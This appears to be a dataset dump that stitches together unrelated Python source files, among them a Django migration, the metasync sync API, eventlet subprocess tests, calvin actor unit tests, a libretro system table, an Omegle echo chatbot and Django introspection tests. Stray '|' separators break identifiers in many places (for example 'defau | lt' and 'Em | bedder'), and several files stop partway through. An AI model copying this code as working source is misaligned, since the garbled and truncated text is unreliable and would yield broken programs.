    (preserve_default=False); auto_now=True keeps the field current
    on subsequent saves.
    """
    dependencies = [
        ('transcripts', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='transcriptpage',
            name='updated_at',
            field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 6, 16, 22, 52, 58, 616986, tzinfo=utc)),
            preserve_default=False,
        ),
    ]
|
UWNetworksLab/metasync | metasync/metasyncAPI.py | Python | mit | 48,287 | 0.003769 | import os
import io
import sys
import time
import threading
import struct
import pickle
import tempfile
import shutil
import types
from threading import Thread
from Queue import Queue
from multiprocessing import cpu_count
from mapping import DetMap2
import dbg
import util
import services
import translators
from blobs import *
from params import *
#
# basic use of ThreadPool:
# pool.submit(func, arg1, arg2)
# pool.join()
#
class Worker(Thread):
    """Daemon thread executing tasks from a given tasks queue.

    Each task is a 4-tuple ``(clone, func, args, kargs)``: ``clone`` is called
    to obtain a per-task service object, which is then passed to ``func`` as
    its first argument.
    """
    def __init__(self, tasks):
        Thread.__init__(self)
        self.tasks = tasks
        self.daemon = True
        self.start()

    def run(self):
        while True:
            clone, func, args, kargs = self.tasks.get()
            # Pre-bind so the error report below is safe even when clone()
            # itself fails (the old code hit a NameError on `srv` in that
            # case, killing the worker without ever calling task_done()).
            srv = None
            try:
                srv = clone()
                func(*((srv,) + args), **kargs)
            except Exception as e:
                # Report and keep the worker alive.
                print(srv)
                print(func)
                print(e)
            finally:
                # Always account for the task so Queue.join() cannot hang.
                self.tasks.task_done()
class ThreadPool:
    """Pool of worker threads consuming tasks from a shared, bounded queue."""

    def __init__(self, num_threads):
        # Bounded queue: submitters block instead of piling work up.
        self.tasks = Queue(num_threads)
        for _unused in range(num_threads):
            Worker(self.tasks)

    def submit(self, c, func, *args, **kargs):
        """Queue a task; it runs as func(c(), *args, **kargs) on a worker."""
        task = (c, func, args, kargs)
        self.tasks.put(task)

    def join(self):
        """Block until every submitted task has been processed."""
        self.tasks.join()
class ServiceThread(Thread):
    """A dedicated daemon thread owning a single service.

    All requests submitted to this thread run one after another, so access
    to the underlying service is serialized."""
    def __init__(self, service):
        Thread.__init__(self)
        self.srv = service
        self.tasks = Queue(5)  # TODO: what's the proper number
        self.daemon = True
        self.start()

    def run(self):
        while True:
            func, args, kargs = self.tasks.get()
            try:
                func(*((self.srv,) + args), **kargs)
            except Exception as e:
                print(e)
            self.tasks.task_done()

    def submit(self, func, *args, **kargs):
        self.tasks.put((func, args, kargs))

    def join(self):
        self.tasks.join()
class Scheduler:
    """Dispatch jobs either to a per-service serial thread or a shared pool."""
    def __init__(self, services, maxthreads=None):
        self.srv_threads = {}
        # XXX. inflexible in dealing with changes of services (list)
        if maxthreads is None or cpu_count() > maxthreads:
            maxthreads = cpu_count()
        nthreads = maxthreads - len(services)
        for srv in services:
            self.srv_threads[srv] = ServiceThread(srv)
        dbg.dbg("init scheduler: %s" % nthreads)
        self.pool = ThreadPool(min(nthreads, 3*len(services)))

    def submit(self, srv, serialize, func, *args, **kargs):
        """Run func(srv, ...): serialized on srv's dedicated thread when
        requested, otherwise on a copy of srv in the shared pool."""
        if serialize:
            self.srv_threads[srv].submit(func, *args, **kargs)
        else:
            self.pool.submit(srv.copy, func, *args, **kargs)

    def join(self):
        """Drain the shared pool first, then every per-service thread."""
        self.pool.join()
        for srv in self.srv_threads:
            self.srv_threads[srv].join()
# handle user's inputs of config options
def _get_conf_services(default):
    """Return a comma-joined list of storage-backend slugs, taken from
    *default* when given, otherwise read interactively from the user."""
    assert type(default) in [types.NoneType, list]
    if default is not None:
        return ",".join(default)
    # dirty user's input: show the available backend slugs and their docs,
    # then accept whatever the user types (validated elsewhere).
    slugs = ",".join(slug for (slug, _) in services.backends())
    print "input storage backends, (e.g., %s)" % slugs
    for (_, doc) in services.backends():
        print "  %s" % doc
    return raw_input("> ").strip()
def _get_conf_nreplicas(default, nservices):
assert type(default) in [types.NoneType, int]
if defau | lt is not None:
return str(default)
# dirty user's input
print "input the number of replicas (default=2)"
while True:
replicas = raw_input("> ").strip()
if replicas == "":
replicas = "2"
if replicas.isdigit():
| if int(replicas) > nservices:
dbg.err("the number of replicas should not be larger than the number of services")
else:
return replicas
else:
print "input the number"
def _get_conf_encryptkey(default):
    """Return the encryption passphrase; an empty string disables encryption."""
    assert type(default) in [types.NoneType, str]
    if default is not None:
        return default
    # NOTE.
    #  empty encrypt_key means, no-encryption
    encrypt_key = ""
    print "do you use encryption (y/n)?"
    # Loop until the user answers exactly 'y' or 'n'.
    while True:
        encrypt_yn = raw_input("> ").strip().lower()
        if(encrypt_yn not in ['y','n']):
            dbg.err("input with y/n")
            continue
        break
    if(encrypt_yn == 'y'):
        print "input keyphrase:"
        encrypt_key = raw_input("> ").strip()
    return encrypt_key
# in charge of a local machine (.metasync)
#
class MetaSync:
    def __init__(self, root, opts=None):
        """Bind this object to the repo containing *root*, set up the
        derived paths, and load config/services/mapping via _load()."""
        #
        # repo/.metasync/
        #  ^    ^
        #  |    +-- meta
        #  +-- root
        # useful path info
        self.path_root = self._find_root(root)
        self.path_meta = os.path.join(self.path_root, META_DIR)
        self.path_conf = self.get_path("config")
        self.path_objs = self.get_path("objects")
        self.path_master = self.get_path("master")
        self.path_head_history = self.get_path("head_history")
        self.options = opts
        # local blob store
        self.blobstore = BlobStore2(self) #BlobStore(self.path_objs)
        # load on demand: these are populated by _load() when the repo
        # passes the sanity check, otherwise they stay empty.
        self.config = None
        self.srvmap = {}
        self.scheduler = None
        self.translators = []
        self.mapping = None
        # post init
        self._load()
def _find_root(self, curpath):
# find repo
curpath = os.path.abspath(curpath)
orgpath = curpath
auth_dir = os.path.join(os.path.expanduser("~"), ".metasync")
while True:
path = os.path.join(curpath, META_DIR)
if(path != auth_dir and os.path.exists(os.path.join(curpath, META_DIR))): return curpath
sp = os.path.split(curpath)
if(sp[1] == ""): break
curpath = sp[0]
return orgpath
    @property
    def services(self):
        # All configured backend service objects (the values of srvmap).
        return self.srvmap.values()
# load member variables from config
def _load(self):
if not self.check_sanity():
return
if(not os.path.exists(AUTH_DIR)): os.mkdir(AUTH_DIR)
# load config
self.config = util.load_config(self.path_conf)
self.namespace = self.config.get("core", "namespace")
self.clientid = self.config.get("core", "clientid")
# load services from config
self.srvmap = {}
for tok in self.config.get("backend", "services").split(","):
srv = services.factory(tok)
self.srvmap[srv.sid()] = srv
self.nreplicas = int(self.config.get("backend", "nreplicas"))
nthreads = self.options.nthreads if self.options is not None else 2
self.scheduler = Scheduler(self.services, (nthreads+1)*len(self.srvmap))
# load translator pipe
if self.is_encypted():
self.translators.append(translators.TrEncrypt(self))
# TODO. for integrity option
# if self.is_signed():
# self.translators.append(TrSigned(self))
beg = time.time()
if(os.path.exists(self.get_path("mapping.pcl"))):
with open(self.get_path("mapping.pcl")) as f:
self.mapping = pickle.load(f)
else:
mapconfig = []
for srv in self.services:
mapconfig.append((srv.sid(), srv.info_storage()/GB))
hspacesum = sum(map(lambda x:x[1], mapconfig))
hspace = max(hspacesum+1, 1024)
self.mapping = DetMap2(mapconfig, hspace=hspace, replica |
ericmjl/bokeh | examples/integration/widgets/tabs_with_multiselect.py | Python | bsd-3-clause | 195 | 0 | from bokeh.io import | save
from bokeh.models import MultiSelect, Tabs
select = MultiSelect(options=["First option", "Second option"])
tabs = Tabs(tabs=[("A tab", select)], widt | h=300)
save(tabs)
|
les69/calvin-base | calvin/tests/test_actor.py | Python | apache-2.0 | 7,248 | 0.000552 | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from mock import Mock
from calvin.tests import DummyNode
from calvin.runtime.north.actormanager import ActorManager
from calvin.runtime.south.endpoint import LocalOutEndpoint, LocalInEndpoint
from calvin.actor.actor import Actor
pytestmark = pytest.mark.unittest
def create_actor(node):
    """Instantiate a std.Identity actor on *node* with a mocked calvinsys."""
    actor_manager = ActorManager(node)
    actor_id = actor_manager.new('std.Identity', {})
    actor = actor_manager.actors[actor_id]
    actor._calvinsys = Mock()  # isolate the actor from the real runtime
    return actor
@pytest.fixture
def actor():
    # A fresh std.Identity actor per test, backed by a dummy runtime node.
    return create_actor(DummyNode())
# NOTE(review): the last two parameter rows are identical duplicates, and the
# fixture function `actor` is called directly here (not injected) — newer
# pytest versions forbid direct fixture calls; confirm before upgrading.
@pytest.mark.parametrize("port_type,port_name,port_property,value,expected", [
    ("invalid", "", "", "", False),
    ("in", "missing", "", "", False),
    ("out", "missing", "", "", False),
    ("out", "token", "missing", "", False),
    ("in", "token", "missing", "", False),
    ("out", "token", "name", "new_name", True),
    ("out", "token", "name", "new_name", True),
])
def test_set_port_property(port_type, port_name, port_property, value, expected):
    # set_port_property succeeds only for an existing port and known property.
    assert actor().set_port_property(port_type, port_name, port_property, value) is expected
@pytest.mark.parametrize("inport_ret_val,outport_ret_val,expected", [
    (False, False, False),
    (False, True, False),
    (True, False, False),
    (True, True, True),
])
def test_did_connect(actor, inport_ret_val, outport_ret_val, expected):
    """did_connect enables the actor (and wakes the scheduler) only once
    every inport AND every outport reports as connected."""
    for port in actor.inports.values():
        port.is_connected = Mock(return_value=inport_ret_val)
    for port in actor.outports.values():
        port.is_connected = Mock(return_value=outport_ret_val)
    actor.fsm = Mock()
    actor.did_connect(None)
    if expected:
        actor.fsm.transition_to.assert_called_with(Actor.STATUS.ENABLED)
        assert actor._calvinsys.scheduler_wakeup.called
    else:
        assert not actor.fsm.transition_to.called
        assert not actor._calvinsys.scheduler_wakeup.called
@pytest.mark.parametrize("inport_ret_val,outport_ret_val,expected", [
    (True, True, False),
    (True, False, False),
    (False, True, False),
    (False, False, True),
])
def test_did_disconnect(actor, inport_ret_val, outport_ret_val, expected):
    """did_disconnect moves the actor back to READY only once every port
    (in and out) reports as disconnected."""
    for port in actor.inports.values():
        port.is_connected = Mock(return_value=inport_ret_val)
    for port in actor.outports.values():
        port.is_connected = Mock(return_value=outport_ret_val)
    actor.fsm = Mock()
    actor.did_disconnect(None)
    if expected:
        actor.fsm.transition_to.assert_called_with(Actor.STATUS.READY)
    else:
        assert not actor.fsm.transition_to.called
def test_enabled(actor):
    # enable()/disable() must be reflected by the enabled() predicate.
    actor.enable()
    assert actor.enabled()
    actor.disable()
    assert not actor.enabled()
def test_connections():
    """connections() reports peer-port ids per attached endpoint: inports map
    to a single (node, peer) tuple, outports to a list of them."""
    node = DummyNode()
    node.id = "node_id"
    actor = create_actor(node)
    inport = actor.inports['token']
    outport = actor.outports['token']
    # Local endpoints pair our port "x" with a peer port "y".
    port = Mock()
    port.id = "x"
    peer_port = Mock()
    peer_port.id = "y"
    inport.attach_endpoint(LocalInEndpoint(port, peer_port))
    outport.attach_endpoint(LocalOutEndpoint(port, peer_port))
    assert actor.connections(node) == {
        'actor_id': actor.id,
        'actor_name': actor.name,
        'inports': {inport.id: (node, "y")},
        'outports': {outport.id: [(node, "y")]}
    }
def test_state(actor):
    """actor.state() must serialize the full actor state, including the
    token FIFOs of both ports, in a JSON-friendly form."""
    inport = actor.inports['token']
    outport = actor.outports['token']
    correct_state = {
        '_component_members': set([actor.id]),
        '_deployment_requirements': [],
        '_managed': set(['dump', '_signature', 'id', '_deployment_requirements', 'name', 'credentials']),
        '_signature': None,
        'dump': False,
        'id': actor.id,
        'inports': {'token': {'fifo': {'N': 5,
                                       'fifo': [{'data': 0, 'type': 'Token'},
                                                {'data': 0, 'type': 'Token'},
                                                {'data': 0, 'type': 'Token'},
                                                {'data': 0, 'type': 'Token'},
                                                {'data': 0, 'type': 'Token'}],
                                       'read_pos': {inport.id: 0},
                                       'readers': [inport.id],
                                       'tentative_read_pos': {inport.id: 0},
                                       'write_pos': 0},
                              'id': inport.id,
                              'name': 'token'}},
        'name': '',
        'outports': {'token': {'fanout': 1,
                               'fifo': {'N': 5,
                                        'fifo': [{'data': 0, 'type': 'Token'},
                                                 {'data': 0, 'type': 'Token'},
                                                 {'data': 0, 'type': 'Token'},
                                                 {'data': 0, 'type': 'Token'},
                                                 {'data': 0, 'type': 'Token'}],
                                        'read_pos': {},
                                        'readers': [],
                                        'tentative_read_pos': {},
                                        'write_pos': 0},
                               'id': outport.id,
                               'name': 'token'}}}
    test_state = actor.state()
    # items() (not the Python-2-only iteritems()) keeps this module importable
    # under Python 3; behavior is identical under Python 2.
    for k, v in correct_state.items():
        # Read state use list to support JSON serialization
        if isinstance(v, set):
            assert set(test_state[k]) == v
        else:
            assert test_state[k] == v
@pytest.mark.parametrize("prev_signature,new_signature,expected", [
(None, "new_val", "new_val"),
("old_va | l", "new_val", "old_val")
])
def test_set_signature(actor, prev_signature, new_signature, expected):
actor.signature_set(prev_sig | nature)
actor.signature_set(new_signature)
assert actor._signature == expected
def test_component(actor):
    """component_add/component_remove accept both scalars and lists."""
    actor.component_add(1)
    assert 1 in actor.component_members()
    actor.component_add([2, 3])
    members = actor.component_members()
    assert 2 in members
    assert 3 in members
    actor.component_remove(1)
    assert 1 not in actor.component_members()
    actor.component_remove([2, 3])
    remaining = actor.component_members()
    assert 2 not in remaining
    assert 3 not in remaining
def test_requirements(actor):
    """requirements_add replaces by default and appends with extend=True."""
    fetch = actor.requirements_get
    assert fetch() == []
    actor.requirements_add([1, 2, 3])
    assert fetch() == [1, 2, 3]
    actor.requirements_add([4, 5])               # plain add replaces
    assert fetch() == [4, 5]
    actor.requirements_add([6, 7], extend=True)  # extend appends
    assert fetch() == [4, 5, 6, 7]
fabsx00/joern-tools | joerntools/mlutils/pythonEmbedder/PythonEmbedder.py | Python | gpl-3.0 | 2,124 | 0.01177 | import os
from FeatureArray import FeatureArray
from FeatureArrayToMatrix import FeatureArrayToMatrix
class Embedder:
    def embed(self, directory, tfidf = True):
        """
        For a given directory containing a TOC and a data/
        directory as, for example, created by joern-demux,
        create an embedding in libsvm format and save it
        as "embedding.libsvm" in the directory.

        When *tfidf* is True (the default) the term-document matrix
        is tf-idf weighted before being written out.
        """
        featureArray = self._createFeatureArray(directory)
        self.termDocMatrix = self._createTermDocumentMatrix(featureArray)
        if tfidf:
            self.termDocMatrix.tfidf()
        self._outputInLIBSVMFormat(directory)
    def _createFeatureArray(self, directory):
        # Build a FeatureArray from every file under directory/data: the file
        # name becomes the label and its lines become the feature items.
        featureArray = FeatureArray()
        dataDir = os.path.join(directory, 'data')
        filenames = os.listdir(dataDir)
        for f in filenames:
            label = f
            filename = os.path.join(dataDir, f)
            items = file(filename, 'r').readlines()  # py2 file(); handle is never closed explicitly
            featureArray.add(label, items)
        return featureArray
    def _createTermDocumentMatrix(self, featureArray):
        # Delegate the conversion to the dedicated converter object.
        converter = FeatureArrayToMatrix()
        return converter.convertFeatureArray(featureArray)
def _outputInLIBSVMFormat(self, directory):
from scipy.sparse import csc_matrix
if self.termDocMatrix.matrix == None: return
m = csc_matrix(self.termDocMatrix.matrix)
nCols = m.shape[1]
outFilename = os.path.join(directory, 'embedding.libsvm')
outFile = file(outFilename, 'w')
for i in xrange(nCols):
label = self.termDocMatrix.index2Doc[i]
col = m.getcol(i)
entries = [(i,col[i,0]) for i in col.indices]
entries.sort()
features = " ".join(['%d:%f' % e for e in entries])
row = '%s %s #%s\n' % (label, features, label)
outFile.write(row)
|
outFile.close()
if __name__ == '__main__':
import sys
embeder = Em | bedder()
embeder.embed(sys.argv[1])
|
team-phoenix/Phoenix | frontend/python/updaters/sqlTableUpdater.py | Python | gpl-2.0 | 50,004 | 0.00792 | import os
from collections import OrderedDict
from .sqldatabase import SqlDatabase
from .retrieve_core_info import retrieveCoreInfo
# Root class that all SQL table updaters derive from
class SqlTableUpdater():
    def __init__(self, tableName, tableColumns=[], coreInfo={}):
        # NOTE(review): mutable default arguments are shared across calls;
        # they are only read here, but confirm subclasses never mutate them.
        self.tableName = tableName
        self.columnsDict = OrderedDict(tableColumns)
        # The sqlite file lives next to the scripts, under .../metadata/.
        self.dbFile = os.path.join(os.getcwd().replace("python", "metadata"), "libretro.sqlite")
        self.dbFileExists = os.path.isfile(self.dbFile)
        self.coreInfo = coreInfo
        # self.filterUnusedCores()
    def updateTable(self):
        # Hook overridden by concrete updaters; the base implementation is a no-op.
        pass
def updateColumns(self, database, additionalStatement: str = ""):
if not self.dbFileExists:
database.createTable(self.tableName, self.columnsDict, additionalStatement)
else:
try:
database.deleteTable(self.tableName)
except:
database.createTable(self.tableName, self.columnsDict, additionalStatement)
    def __del__(self):
        # Progress log emitted at garbage collection; __del__ timing is
        # interpreter-dependent, so treat this as best-effort output only.
        print("Updated " + self.tableName + " table.")
    def libretroSystemList(self):
        """Return a sorted, de-duplicated list of system names gathered from
        every emulator core in self.coreInfo."""
        systems = []
        for k, v in self.coreInfo['cores'].items():
            if "categories" not in v or v["categories"] != "Emulator":
                continue
            if "database" in v:
                # "database" is a '|'-separated list of system identifiers.
                name = v["database"].split("|")
                for n in name:
                    systems.append(n)
                    # Split console and manufacturer names
                    # Not really necessary for Libretro identifiers
                    #tup = n.split(" - ")
                    #
                    ## "MAME"
                    #if len(tup) == 1:
                    #    systems.append(tup[0])
                    #
                    ## Nearly every one
                    #elif len(tup) == 2:
                    #    systems.append(tup[1])
                    #
                    ## Sega - Master System - Mark III
                    ## Sega - Mega Drive - Genesis
                    #elif len(tup) == 3:
                    #    systems.append(tup[1])
            # There are some cores that do not have "database" defined
            elif "systemname" in v:
                systems.append(v["systemname"])
        systems = list(set(systems))
        systems.sort()
        return systems
# This map defines all Libretro-based systems that Phoenix supports. If it isn't in here, it isn't supported by Phoenix!
# TODO: Place this information into an entirely separate database
# WARNING: Do NOT change Phoenix UUIDs (1st column), even if there are spelling mistakes. Change friendlyName if you really need to.
phoenixSystemDatabase = {
# friendlyName: North American console name without manufacturer
# shortName: Abbreviation (typically 3 letters)
# enabled: True iff a core is available, Phoenix can run it, and the game scanner can find it (extensions set)
# Everything else
"Arcade": {"enabled": False, "defaultCore": "mame_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
# Conspicuously missing from No-Intro
"Amstrad - CPC": {"enabled": False, "defaultCore": "cap32_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Amstrad" },
"Atari - 2600": {"enabled": True, "defaultCore": "stella_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Capcom - CP System I": {"enabled": False, "defaultCore": "fb_alpha_cps1_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CP System II": {"enabled": False, "defaultCore": "fb_alpha_cps2_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CP System III": {"enabled": False, "defaultCore": "fbalpha2012_cps3_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CPS Changer": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"CHIP-8": {"enabled": False, "defaultCore": "emux_chip8_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"DOS": {"enabled": False, "defaultCore": "dosbox_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"Mattel - Intellivision": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Mattel" },
"Nintendo - Game & Watch": {"enabled": False, "defaultCore": "gw_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Sinclair - ZX81": {"enabled": False, "defaultCore": "81_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sinclair" },
"SNK - Neo Geo": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
# No-Intro, both official and non-official (ROM-based games)
"Atari - 5200": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - 7800": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - Jaguar": {"enabled": True, "defaultCore": "virtualjaguar_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - Lynx": {"enabled": True, "defaultCore": "mednafen_lynx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - ST": {"enabled": True, "defaultCore": "hatari_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Bandai - WonderSwan Color": {"enabled": True, "defaultCore": "mednafen_wswan_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Bandai - WonderSwan": {"enabled": True, "defaultCore": "mednafen_wswan_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Casio - Loopy": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Casio" },
"Casio - PV-1000": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Casio" },
"Coleco - ColecoVision": {"enabled": False, "defaultCore": "mess2014_libretro", |
kawamon/hue | desktop/core/ext-py/eventlet-0.24.1/tests/subprocess_test.py | Python | apache-2.0 | 3,313 | 0.000302 | import sys
import time
import eventlet
from eventlet.green import subprocess
import eventlet.patcher
import tests
original_subprocess = eventlet.patcher.original('subprocess')
def test_subprocess_wait():
# https://bitbucket.org/eventlet/eventlet/issue/89
# In Python 3.3 subprocess.Popen.wait() method acquired `timeout`
# argument.
# RHEL backported it to their Python 2.6 package.
cmd = [sys.executable, "-c", "import time; time.sleep(0.5)"]
p = subprocess.Popen(cmd)
ok = False
t1 = time.time()
try:
p.wait(timeout=0.1)
except subprocess.TimeoutExpired as e:
str(e) # make sure it doesn't throw
assert e.cmd == cmd
| assert e.timeout == 0.1
ok = True
tdiff = time.time() - t1
assert ok, 'did not raise subprocess.TimeoutExpired'
assert 0.1 <= tdiff <= 0.2, 'did not stop within allowed time'
def test_communicate_with_poll():
    # Verifies that communicate() can be interrupted by an eventlet timeout
    # and returns within the allowed window.
    #
    # This test was being skipped since git 25812fca8; I don't think there's
    # a need to do this. The original comment:
    #
    # https://github.com/eventlet/eventlet/pull/24
    # `eventlet.green.subprocess.Popen.communicate()` was broken
    # in Python 2.7 because the usage of the `select` module was moved from
    # `_communicate` into two other methods `_communicate_with_select`
    # and `_communicate_with_poll`. Link to 2.7's implementation:
    # http://hg.python.org/cpython/file/2145593d108d/Lib/subprocess.py#l1255
    p = subprocess.Popen(
        [sys.executable, '-c', 'import time; time.sleep(0.5)'],
        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    t1 = time.time()
    eventlet.with_timeout(0.1, p.communicate, timeout_value=True)
    tdiff = time.time() - t1
    assert 0.1 <= tdiff <= 0.2, 'did not stop within allowed time'
def test_close_popen_stdin_with_close_fds():
    """Closing stdin of a finished close_fds subprocess must not raise."""
    proc = subprocess.Popen(
        ['ls'],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        close_fds=True,
        shell=False,
        cwd=None,
        env=None)
    proc.communicate(None)
    try:
        proc.stdin.close()
    except Exception as e:
        assert False, "Exception should not be raised, got %r instead" % e
def test_universal_lines():
    """Popen with universal_newlines=True must complete a communicate() round-trip."""
    cmd = [sys.executable, '--version']
    proc = subprocess.Popen(
        cmd,
        shell=False,
        stdout=subprocess.PIPE,
        universal_newlines=True)
    proc.communicate(None)
def test_patched_communicate_290():
    # https://github.com/eventlet/eventlet/issues/290
    # Certain order of import and monkey_patch breaks subprocess communicate()
    # with AttributeError module `select` has no `poll` on Linux
    # unpatched methods are removed for safety reasons in commit f63165c0e3
    # Runs in a separate interpreter so the import order can be controlled.
    tests.run_isolated('subprocess_patched_communicate.py')
def test_check_call_without_timeout_works():
    """Regression guard: check_call() must not require a timeout argument.

    The regression raised:
    TypeError: check_call() missing 1 required keyword-only argument: 'timeout'
    """
    subprocess.check_call(
        ['ls'],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
def test_exception_identity():
    # https://github.com/eventlet/eventlet/issues/413
    # green module must keep exceptions classes as stdlib version
    # Runs in a separate interpreter to control patching order.
    tests.run_isolated('subprocess_exception_identity.py')
|
SThomasP/ECSSystemsBot | TestProcedures/GetWebPage.py | Python | gpl-3.0 | 1,077 | 0.011142 | from urllib.request import urlopen
for line in urlopen('https://secure.ecs.soton.ac.uk/status/'):
line = line.decode('utf-8') # Decoding the binary data to text.
if 'Core Priority Devices' in line: #look for 'Core Priority Devices' To find the line of text with the list of issues
linesIWant = line.split('Priority Devices')[2].split("<tr")
linesIWant.pop()
linesIWant.pop(0)
issues=[]
for f in linesIWant:
if not 'border: 0p | x' in f:
if 'machine' in f:
machineName=f.split('<b>')[1].split('</b>')[0]
if 'state_2' in f:
service=f.split('<td>')[2].split('</td>')[0]
problem=f.split('<td>')[3].split('</td>')[0]
issues.append(service+','+machineName+','+problem+'\n')
elif 'state_2' in f:
service=f.split('<td>') | [1].split('</td>')[0]
problem=f.split('<td>')[2].split('</td>')[0]
issues.append(service+','+machineName+','+problem+'\n')
logfile=open('newlog.txt','w')
logfile.writelines(issues)
logfile.close()
|
tomviner/exploring-unittesting-talk | code-examples/test_unittest_suite.py | Python | apache-2.0 | 610 | 0.008197 | import unittest
def add(a, b):
return | a + b
class TestKnownGood(unittest.TestCase):
def __init__(self, input, output) | :
super(TestKnownGood, self).__init__()
self.input = input
self.output = output
def runTest(self):
self.assertEqual(add(*self.input), self.output)
def suite():
    """Build a TestSuite containing one TestKnownGood case per known
    (input, expected-output) pair."""
    suite = unittest.TestSuite()  # NOTE: local deliberately shadows this function's name
    known_values = [
        ((1, 2), (3)),
        ((2, 3), (5)),
    ]
    suite.addTests(TestKnownGood(input, output)
        for input, output in known_values)
    return suite
if __name__ == '__main__':
unittest.TextTestRunner().run(suite()) |
need12648430/OmegaPy | Chatbot.py | Python | mit | 980 | 0.040816 | """
demo: simple chatbot
connects with a stranger greeting them with "hi, i'm a chatbot"
then proceeds to echo all messag | es sent to it
"""
from Omegle import *
import time
class SimpleChatbot(OmegleHandler):
    # Minimal Omegle handler: greets the stranger once, then echoes every
    # message back after a short fake "typing" pause.
    def on_connect(self):
        print "stranger connected"
        greeting = "hi, i'm a chatbot"
        self.omegle.send(greeting)
        print "y > " + greeting
    def on_typing_start(self):
        print "stranger | is typing..."
    def on_typing_stop(self):
        print "stranger stopped typing."
    def on_message(self, message):
        print "s > " + message
        # pretend to type for 1 second to look real
        self.omegle.start_typing()
        time.sleep(1)
        # send message
        self.omegle.send(message)
        # tell omegle we're done "typing"
        self.omegle.stop_typing()
        print "y > " + message
    def on_disconnect(self):
        # Immediately queue up the next conversation.
        print "stranger disconnected, next please"
        self.omegle.start_chat(OmegleChat.Classic)
chatbot = SimpleChatbot()
omegle = OmegleChat(chatbot)
omegle.start_chat(OmegleChat.Classic) |
vsajip/django | tests/regressiontests/introspection/tests.py | Python | bsd-3-clause | 6,655 | 0.003606 | from __future__ import absolute_import,unicode_literals
from functools import update_wrapper
from django.db import connection
from django.test import TestCase, skipUnlessDBFeature, skipIfDBFeature
from django.utils import six
from .models import Reporter, Article
#
# The introspection module is optional, so methods tested here might raise
# NotImplementedError. This is perfectly acceptable behavior for the backend
# in question, but the tests need to handle this without failing. Ideally we'd
# skip these tests, but until #4788 is done we'll just ignore them.
#
# The easiest way to accomplish this is to decorate every test case with a
# wrapper that ignores the exception.
#
# The metaclass is just for fun.
#
def ignore_not_implemented(func):
    """Return *func* wrapped so that NotImplementedError is swallowed and
    None is returned instead; the wrapper keeps func's metadata."""
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except NotImplementedError:
            return None
    update_wrapper(wrapper, func)
    return wrapper
class IgnoreNotimplementedError(type):
    """Metaclass that wraps every test* attribute with ignore_not_implemented,
    so backends lacking an introspection method don't fail the tests."""
    def __new__(mcls, name, bases, attrs):
        for attr_name, attr_value in list(attrs.items()):
            if attr_name.startswith('test'):
                attrs[attr_name] = ignore_not_implemented(attr_value)
        return type.__new__(mcls, name, bases, attrs)
class IntrospectionTests(six.with_metaclass(IgnoreNotimplementedError, TestCase)):
def test_table_names(self):
tl = connection.introspection.table_names()
self.assertEqual(tl, sorted(tl))
self.assertTrue(Reporter._meta.db_table in tl,
"'%s' isn't in table_list()." % Reporter._meta.db_table)
self.assertTrue(Article._meta.db_table in tl,
"'%s' isn't in table_list()." % Article._meta.db_table)
def test_django_table_names(self):
cursor = connection.cursor()
cursor.execute('CREATE TABLE django_ixn_test_table (id INTEGER);')
tl = connection.introspection.django_table_names()
cursor.execute("DROP TABLE django_ixn_test_table;")
self.assertTrue('django_ixn_testcase_table' not in tl,
"django_table_names() returned a non-Django table")
def test_django_table_names_retval_type(self):
# Ticket #15216
cursor = connection.cursor()
cursor.execute('CREATE TABLE django_ixn_test_table (id INTEGER);')
tl = connection.introspection.django_table_na | mes(only_existin | g=True)
self.assertIs(type(tl), list)
tl = connection.introspection.django_table_names(only_existing=False)
self.assertIs(type(tl), list)
def test_installed_models(self):
tables = [Article._meta.db_table, Reporter._meta.db_table]
models = connection.introspection.installed_models(tables)
self.assertEqual(models, set([Article, Reporter]))
def test_sequence_list(self):
sequences = connection.introspection.sequence_list()
expected = {'table': Reporter._meta.db_table, 'column': 'id'}
self.assertTrue(expected in sequences,
'Reporter sequence not found in sequence_list()')
def test_get_table_description_names(self):
cursor = connection.cursor()
desc = connection.introspection.get_table_description(cursor, Reporter._meta.db_table)
self.assertEqual([r[0] for r in desc],
[f.column for f in Reporter._meta.fields])
